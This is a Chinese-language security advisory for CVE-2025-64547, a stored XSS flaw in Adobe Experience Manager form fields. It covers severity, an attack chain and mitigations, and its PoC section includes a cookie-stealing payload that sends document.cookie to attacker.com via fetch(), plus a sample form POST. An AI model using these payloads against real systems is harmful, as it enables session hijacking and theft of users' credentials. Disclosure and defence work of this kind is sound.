CVE-2025-64547 Adobe Experience Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-64547

漏洞类型

存储型跨站脚本攻击（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Adobe Experience Manager

漏洞概述

CVE-2025-64547是Adobe Experience Manager中的一个存储型跨站脚本（Stored XSS）漏洞。该漏洞影响Adobe Experience Manager 6.5.23及更早版本。攻击者利用该漏洞可以通过低权限账户向存在漏洞的表单字段中注入恶意JavaScript代码。由于该脚本被存储在服务器端，当其他用户访问包含该漏洞字段的页面时，恶意代码会在受害者浏览器中自动执行，从而实现会话劫持、敏感信息窃取、钓鱼攻击等恶意操作。这种存储型XSS的危害性比反射型XSS更高，因为恶意脚本会被永久保存在目标服务器上，影响所有访问该页面的用户。Adobe官方已确认该漏洞的存在并发布了安全公告（APSB25-115），建议用户尽快升级到最新版本以修复该安全问题。

技术细节

该漏洞是一个典型的存储型XSS（Stored Cross-Site Scripting）漏洞，存在于Adobe Experience Manager的表单处理模块中。攻击过程如下：1. 攻击者首先使用低权限账户登录Adobe Experience Manager系统；2. 攻击者在存在漏洞的表单字段中注入恶意JavaScript代码，如<img src=x onerror=alert(document.cookie)>等；3. 由于系统未对用户输入进行充分的HTML转义或输入验证，恶意脚本被直接存储到数据库中；4. 当其他用户（受害者）访问包含该表单字段的页面时，服务器从数据库中读取并展示这些未经过滤的内容；5. 受害者的浏览器将恶意脚本作为页面的一部分执行，从而窃取Cookie、会话令牌或其他敏感信息。攻击者可以利用窃取的会话信息进一步提升权限或执行其他恶意操作。该漏洞的CVSS向量为CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N，表明攻击复杂度低，但需要用户交互才能触发。

攻击链分析

STEP 1

步骤1

攻击者获取Adobe Experience Manager系统的低权限账户访问权限

STEP 2

步骤2

攻击者识别系统中存在漏洞的表单字段，这些字段缺乏输入验证和输出编码

STEP 3

步骤3

攻击者向表单字段中注入恶意JavaScript代码，如<img src=x onerror=...>或<script>标签

STEP 4

步骤4

恶意脚本被存储在服务器数据库中，未经过滤或转义处理

STEP 5

步骤5

受害者访问包含该表单字段的页面，服务器将存储的恶意内容返回给受害者浏览器

STEP 6

步骤6

受害者浏览器执行恶意JavaScript代码，导致Cookie窃取、会话劫持或其他恶意操作

STEP 7

步骤7

攻击者利用窃取的凭证进一步扩大攻击范围或获取更高权限

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2025-64547 Stored XSS PoC for Adobe Experience Manager
// This PoC demonstrates the stored XSS vulnerability in AEM form fields

// Step 1: Identify vulnerable form field
// Navigate to any AEM form page that allows user input

// Step 2: Inject malicious JavaScript payload into the vulnerable field
// Example payload for cookie stealing:
const xssPayload = `<img src=x onerror="
  fetch('https://attacker.com/steal?cookie=' + document.cookie)
">`;

// Alternative payload - basic alert demonstration:
const simplePayload = `<script>alert('XSS by CVE-2025-64547')</script>`;

// Step 3: Submit the form with the malicious payload
// POST request example:
const exploit = {
  method: 'POST',
  url: 'https://target-aem.com/content/forms/af/submit',
  data: {
    'formfield': xssPayload,
    './jcr:data': xssPayload
  }
};

// Step 4: Wait for victim to access the page containing the stored script
// The malicious script will execute in victim's browser automatically

// Note: This is for educational and security testing purposes only

影响范围

Adobe Experience Manager 6.5.23及更早版本

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 限制低权限用户对表单字段的编辑权限；2) 在Web应用防火墙(WAF)层面添加XSS过滤规则；3) 启用浏览器的XSS防护功能；4) 监控和审计表单提交日志以检测异常输入。但最根本的解决方案仍是尽快升级到Adobe官方发布的安全版本。